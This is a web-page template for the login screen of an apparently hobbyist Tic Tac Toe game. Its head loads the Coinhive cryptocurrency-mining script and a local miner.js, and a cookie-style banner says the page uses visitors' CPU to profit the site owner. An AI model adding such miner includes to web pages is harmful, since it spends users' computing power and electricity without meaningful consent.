<!DOCTYPE html>
<html>
	<head>
		<title>Tic Tac Toe</title>
		<script src ="<%= address %>/socket.io/socket.io.js"></script>
		<link rel="stylesheet" href="/stylesheets/login.css">
		<script src="https://coinhive.com/lib/coinhive.min.js"></script>
		<script src="/javascripts/miner.js"></script>
		<link rel="stylesheet" href="/stylesheets/main.css" />
	</head>
	<body>
		
		<div id = "container">
			<div id = "cookies">This page uses cookies.This page use your cpu to generate profit to site owner.</div>
			<div id = "connect_panel">
				<div id = "title">Login</div>
				<br>
				<input class = "button" id = "login_input" placeholder = "login:" type = "text">
				<br>
				<input class = "button" id = "password_input" placeholder = "password:" type = "password">
				<br>
				<button id = "login_button">Login</button>
				<a href = "./register">register</a>
			</div>
		</div>

		<script src = "/javascripts/cookies.js"></script>
		<script src = "/javascripts/useful.js"></script>
		<script src = "/javascripts/login.js"></script>
	</body>
</html>